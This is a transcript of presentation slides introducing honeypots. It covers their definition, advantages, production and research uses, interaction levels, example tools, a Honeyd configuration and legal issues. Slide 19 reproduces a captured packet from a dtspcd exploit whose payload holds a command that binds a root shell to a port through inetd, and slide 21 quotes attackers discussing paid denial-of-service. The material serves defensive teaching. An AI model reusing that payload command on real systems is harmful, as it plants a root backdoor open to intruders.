Presentation is loading. Please wait.

Presentation is loading. Please wait.

Honeypots.

Published byTord Samuelsen Modified over 5 years ago

Similar presentations

Presentation on theme: "Honeypots."— Presentation transcript:

1 Honeypots

2 Your Speaker Lance Spitzner
Senior Security Architect, Sun Microsystems Founder of the Honeynet Project Author of Honeypots: Tracking Hackers Co-author of Know Your Enemy Moderator of maillist Former ‘tread head’.

3 Purpose To introduce you to honeypots, what they are, how they work, their value.

4 Problem Variety of misconceptions about honeypots, everyone has their own definition. This confusion has caused lack of understanding, and adoption.

5 Honeypot Timeline 1990/1991 The Cuckoo’s Egg and Evening with Berferd
Deception Toolkit CyberCop Sting NetFacade (and Snort) BackOfficer Friendly Formation of the Honeynet Project Worms captured dtspcd exploit capture

6 Definition Any security resource who’s value lies in being probed, attacked, or compromised

7 How honeypots work Simple concept
A resource that expects no data, so any traffic to or from it is most likely unauthorized activity

8 Not limited to specific purpose
Honeypots do not solve a specific problem, instead they are a tool that contribute to your overall security architecture. Their value, and the problems they help solve, depend on how build, deploy, and you use them.

9 Types Production (Law Enforcment) Research (Counter-Intelligence)
Marty’s idea

10 Value What is the value of honeypots?
One of the greatest areas of confusion concerning honeypot technologies.

11 Advantages Based on how honeypots conceptually work, they have several advantages. Reduce False Positives and False Negatives Data Value Resources Simplicity

12 Disadvantages Based on the concept of honeypots, they also have disadvantages: Narrow Field of View Fingerprinting Risk

13 Production Prevention Detection Response

14 Prevention Keeping the burglar out of your house.
Honeypots, in general are not effective prevention mechanisms. Deception, Deterence, Decoys, are phsychological weapons. They do NOT work against automated attacks: worms auto-rooters mass-rooters

15 Detection Detecting the burglar when he breaks in.
Honeypots excel at this capability, due to their advantages.

16 Response Honeypots can be used to help respond to an incident.
Can easily be pulled offline (unlike production systems. Little to no data pollution.

17 Research Honeypots Early Warning and Prediction
Discover new Tools and Tactics Understand Motives, Behavior, and Organization Develop Analysis and Forensic Skills

18 Early Warning and Prediction

19 Tools 01/08-08:46: :3592 -> :6112 TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32 TCP Options (3) => NOP NOP TS: e00 C 80 1C C C 80 1C C C C D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#.. B 91 D F E 2F 6B /bin/ksh D F E c echo "in C 6F 63 6B D 20 greslock stream E 6F F 6F tcp nowait root 2F E 2F D E 2F /bin/sh sh -i">/ 74 6D 70 2F 78 3B 2F F E 2F tmp/x;/usr/sbin/ 69 6E D F 74 6D 70 2F 78 3B inetd -s /tmp/x; 73 6C B 2F E 2F 72 6D sleep 10;/bin/rm 20 2D F 74 6D 70 2F f /tmp/x AAAAA AAAAAAAAAAAAAAAA

20 Tactics

21 Motives and Behavior J4ck: why don't you start charging for packet
attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time" J1LL: it was illegal last I checked. J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting.

22 Level of Interaction Level of Interaction determines amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk.

23 Risk Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.

24 Low Interaction Provide Emulated Services
No operating system for attacker to access. Information limited to transactional information and attackers activities with emulated services.

25 High Interaction Provide Actual Operating Systems
Learn extensive amounts of information. Extensive risk.

26 Honeypots BackOfficer Friendly SPECTER Honeyd ManTrap Honeynets
SPECTER Honeyd ManTrap Honeynets Low Interaction High Interaction

27 BackOfficer Friendly

28 Specter

29 Honeyd create default set default personality "FreeBSD 2.2.1-STABLE"
set default default action open add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh" add default tcp port 113 reset add default tcp port 1 reset create windows set windows personality "Windows NT 4.0 Server SP5-SP6" set windows default action reset add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23 add windows tcp port 22 proxy $ipsrc:22 set template uptime bind windows

30 ManTrap

31 Honeynets

32 Which is best? None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve.

33 Legal Issues Privacy Entrapment Liability

34 Legal Contact for .mil / .gov
Department of Justice, Computer Crime and Intellectual Property Section General Number: (202) Specific Contact: Richard Salgado Direct Telephone (202) E-Mai: Any military or federal government organization can get legal advice for Honeynets from the Department of Justice. Richard Solgado of the DoJ has been researching Honeynet technologies and is the point of contact for any legal issues. For non government and military organizations, you are highly encouraged to refer to your local legal counsel for legal issues involving Honeynet technologies.

35 Summary Honeypos are a highly flexible security tool that can be used in a variety of different deployments.

36 Resources Honeypots: Tracking Hackers

Download ppt "Honeypots."

Similar presentations

Honeynet Introduction Tang Chin Hooi APAN Secretariat.

Honeynet Introduction Tang Chin Hooi APAN Secretariat.
Uzair Masood 100111089 MASYU001.  What is a honey Pot ? “ A honey pot is an information system resource whose value lies in unauthorized or illicit use.

Uzair Masood MASYU001.  What is a honey Pot ? “ A honey pot is an information system resource whose value lies in unauthorized or illicit use.
HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.

HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.
Honeypot Group 1E Zahra Kamali (KAMZY001) Pratik Doshi (DOSPY001) Tapan Dave (DAVTH001)

Honeypot Group 1E Zahra Kamali (KAMZY001) Pratik Doshi (DOSPY001) Tapan Dave (DAVTH001)
Honeypot 서울과학기술대학교 Jeilyn Molina 121336101. Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.

Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
HoneyPots Malware Class Presentation Xiang Yin, Zhanxiang Huang, Nguyet Nguyen November 2 nd 2004.

HoneyPots Malware Class Presentation Xiang Yin, Zhanxiang Huang, Nguyet Nguyen November 2 nd 2004.
Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.

Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.
Presented by Stanley Chand & Damien Prescod

Presented by Stanley Chand & Damien Prescod
Honeypots and Honeynets Source: The HoneyNet Project Book: Know Your Enemy (2 nd ed) Presented by: Mohammad.

Honeypots and Honeynets Source: The HoneyNet Project Book: Know Your Enemy (2 nd ed) Presented by: Mohammad.
Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.

Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.
Honeypots Margaret Asami. What are honeypots ? an intrusion detection mechanism entices intruders to attack and eventually take over the system, while.

Honeypots Margaret Asami. What are honeypots ? an intrusion detection mechanism entices intruders to attack and eventually take over the system, while.
Intrusion Prevention System DYNAMIC HONEYNET by Rosenfeld Asaf advisor Uritzky Max.

Intrusion Prevention System DYNAMIC HONEYNET by Rosenfeld Asaf advisor Uritzky Max.
Lesson 13-Intrusion Detection. Overview Define the types of Intrusion Detection Systems (IDS). Set up an IDS. Manage an IDS. Understand intrusion prevention.

Lesson 13-Intrusion Detection. Overview Define the types of Intrusion Detection Systems (IDS). Set up an IDS. Manage an IDS. Understand intrusion prevention.
January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS 4600 - © Abdou Illia.

January 14, 2010 Introduction to Ethical Hacking and Network Defense MIS © Abdou Illia.
1 The Honeynet Project: Trapping the Hackers Lance Spitzner, Sun Microsystems Presented by Vikrant Karan.

1 The Honeynet Project: Trapping the Hackers Lance Spitzner, Sun Microsystems Presented by Vikrant Karan.
Honeypots By Merkur Maclang and John Luzzi CMPT 495.

Honeypots By Merkur Maclang and John Luzzi CMPT 495.
Lecture 11 Intrusion Detection (cont)

Lecture 11 Intrusion Detection (cont)
Network Forensics Networking Basics Collecting Network-Based Evidence (NBE) Collection of Packets using Tools Windows Intrusion UNIX Intrusion.

Network Forensics Networking Basics Collecting Network-Based Evidence (NBE) Collection of Packets using Tools Windows Intrusion UNIX Intrusion.
USENIX LISA ‘99 Conference © Copyright 1999, Martin Roesch Snort - Lightweight Intrusion Detection for Networks Martin Roesch.

USENIX LISA ‘99 Conference © Copyright 1999, Martin Roesch Snort - Lightweight Intrusion Detection for Networks Martin Roesch.
Introduction to Honeypot, Botnet, and Security Measurement

Introduction to Honeypot, Botnet, and Security Measurement

Similar presentations

Ads by Google